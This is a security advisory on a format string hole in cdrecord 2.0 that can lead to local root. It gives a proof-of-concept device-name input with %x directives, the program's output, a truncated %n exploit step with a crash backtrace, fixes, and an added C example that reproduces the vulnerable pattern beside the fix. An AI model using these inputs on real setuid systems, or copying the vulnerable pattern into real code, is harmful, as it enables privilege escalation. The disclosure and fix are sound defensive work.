
cdrtools 2.0 Format String Vulnerability

PACKAGE           : cdrtools
VERSION           : 2.0 
SUMMARY           : Format String
SEVERITY          : local root exploit if suid (on several distros)
DATE              : 2003-05-05

I would like to inform you that there is a format string vulnerability
in cdrecord 2.0, in particular in libscg/scsiopen.c at line 273:

   271          if (scg__open(scgp, devname) <= 0) {
   272                  if (errs && scgp->errstr)

>>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<
   274                  scg_sfree(scgp);
   275                  return ((SCSI *)0);
   276          }
!-------         W A R N I N G      -----------!
!--- this  is an exploitable vulnerability! ---!
cdrecord is installed setuid root in several distributions, so this is a real
security hole: the device name on the command line reaches a printf-style
call as the format string.

$ ./cdrecord dev="AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jörg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: No such file or directory. Cannot open
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
As you can see, the last %x refers to AAAABBBBCCCC, so I can use %n to
overwrite anything I want:
e.g. I can find on the stack the location of the return address...
let's say 0xbffcffcc:
$./cdrecord dev=`printf 
(core dump)
$ gdb   `which cdrecord`  core -q
#0  0x3f in ?? ()
(gdb) bt
#0  0x3f in ?? ()
#1  0x8065451 in scg_open ()
#2  0x8049a3b in main ()

so it's exploitable.


A. An updated package can be found at:


B. Replace line 273 of libscg/scsiopen.c with:
	 js_snprintf(errs, slen, "%s", scgp->errstr);

C. Remove the setuid bit with (this sets the whole mode to 0755; chmod u-s would clear only the setuid bit):
	chmod 755 `which cdrecord`
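The following is an added example, not cdrtools code: it reproduces the pattern of line 273 (an attacker-controlled device name that ends up inside errstr, which is then used as the format) next to the fix from B, and adds a small audit helper that counts the conversion directives a string would trigger if misused as a format. The wrapper js_snprintf_like, the open_error_* functions, the error text layout and the sample device names are all constructed here for illustration. The wrapper deliberately carries no format attribute, which is why a compiler's -Wformat-security check never sees the non-literal format at the call site.

```c
#include <errno.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for a project-private printf wrapper (constructed for this
 * example, not libscg's js_snprintf). Without a format attribute the
 * compiler cannot warn about a non-literal format passed through it. */
static int js_snprintf_like(char *buf, size_t len, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(buf, len, fmt, ap);
    va_end(ap);
    return n;
}

/* Error text of the kind an open failure leaves behind: the
 * user-supplied device name followed by the errno text (layout assumed). */
static void build_errstr(char *errstr, size_t len, const char *devname)
{
    snprintf(errstr, len, "Cannot open '%s': %s", devname, strerror(ENOENT));
}

/* Vulnerable pattern: errstr itself is the format string. Any %x, %s or
 * %n inside devname is interpreted; reading the missing arguments is
 * undefined behaviour, which is exactly the bug. */
static int open_error_vuln(char *errs, size_t slen, const char *devname)
{
    char errstr[256];
    build_errstr(errstr, sizeof errstr, devname);
    return js_snprintf_like(errs, slen, errstr);
}

/* Fixed pattern: a constant "%s" format, errstr passed as an argument. */
static int open_error_fixed(char *errs, size_t slen, const char *devname)
{
    char errstr[256];
    build_errstr(errstr, sizeof errstr, devname);
    return js_snprintf_like(errs, slen, "%s", errstr);
}

/* Audit helper: number of conversion directives in s when used as a
 * format. "%%" is a literal percent sign and is not counted. */
static int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Returns 1 if the vulnerable path changed the text, i.e. it interpreted
 * directives from devname; 0 if the text came through unchanged. */
static int directives_interpreted(const char *devname)
{
    char expected[256], got[256];
    build_errstr(expected, sizeof expected, devname);
    open_error_vuln(got, sizeof got, devname);
    return strcmp(expected, got) != 0;
}

/* Returns 1 if the fixed path reproduces errstr byte for byte. */
static int fixed_is_verbatim(const char *devname)
{
    char expected[256], got[256];
    build_errstr(expected, sizeof expected, devname);
    open_error_fixed(got, sizeof got, devname);
    return strcmp(expected, got) == 0;
}

int main(void)
{
    /* Constructed input mirroring the advisory; only %x so that the
     * vulnerable path reads a few stack words instead of dereferencing. */
    const char *dev = "AAAA|%x%x%x%x";
    char out[256];

    open_error_vuln(out, sizeof out, dev);
    printf("vulnerable: %s\n", out);
    open_error_fixed(out, sizeof out, dev);
    printf("fixed:      %s\n", out);
    printf("directives in devname: %d\n", count_conversions(dev));
    return 0;
}
```

Only %x is used in the sample input on purpose: %s or %n would dereference whatever the missing argument slot holds and can crash the process, which is the same behaviour the core dump above shows. The count_conversions helper is the check to run on any string that is about to reach a printf-family call with no arguments of its own; a non-zero result on user-controlled input is a bug regardless of what the string contains.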

Stefano Di Paola
Software Engineer